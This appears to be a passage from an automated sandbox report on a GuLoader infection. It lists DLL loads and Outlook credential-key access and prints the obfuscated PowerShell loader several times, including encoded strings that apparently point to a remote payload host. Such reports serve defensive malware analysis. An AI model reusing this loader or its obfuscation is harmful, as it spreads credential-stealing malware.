                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1726081150.0000000008390000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbf source: powershell.exe, 0000000E.00000002.1723632726.000000000741D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 0000000E.00000002.1723632726.00000000073BF000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsa", "0")
                Yara detected GuLoader
                Source: Yara matchFile source: 0000000E.00000002.1727059954.000000000BAFD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.1716933830.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.1726977424.00000000088B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Forbytter)$global:commercializing = [System.Text.Encoding]::ASCII.GetString($Rengue)$global:Uncrystallizabilities=$commercializing.substring($Kontekstfri,$Untastefulness)<#Hyperobtru
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Baghold $Kalsomining $Disapprobations), (Edsaflggelsen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Taktnxr = [AppDomain]::CurrentDomain.GetAssemblies()
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Praiser)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kildeskats, $false).DefineType($Glansperioder, $M
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Forbytter)$global:commercializing = [System.Text.Encoding]::ASCII.GetString($Rengue)$global:Uncrystallizabilities=$commercializing.substring($Kontekstfri,$Untastefulness)<#Hyperobtru
                Obfuscated command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.Jump to behavior
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg 